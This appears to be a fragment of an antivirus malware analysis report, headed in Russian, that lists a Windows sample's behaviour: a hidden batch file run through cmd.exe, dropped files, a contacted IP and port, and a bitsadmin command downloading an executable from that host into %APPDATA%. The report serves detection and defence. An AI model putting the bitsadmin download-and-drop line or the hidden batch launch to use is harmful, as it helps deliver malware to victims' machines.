Техническая информация
- '<SYSTEM32>\cmd.exe' /c %APPDATA%\siuhdishjd.bat
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 816
- %APPDATA%\siuhdishjd.bat
- nul
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- %TEMP%\1011432.cvr
- '17#.#07.176.63':8012
- '<SYSTEM32>\bitsadmin.exe' /transfer myjob /download /priority high http://17#.#07.176.63:8012/encrypted.exe "%APPDATA%\SS_same_israeli_freegaza.exe"
- '<SYSTEM32>\cmd.exe' /c %APPDATA%\siuhdishjd.bat (со скрытым окном)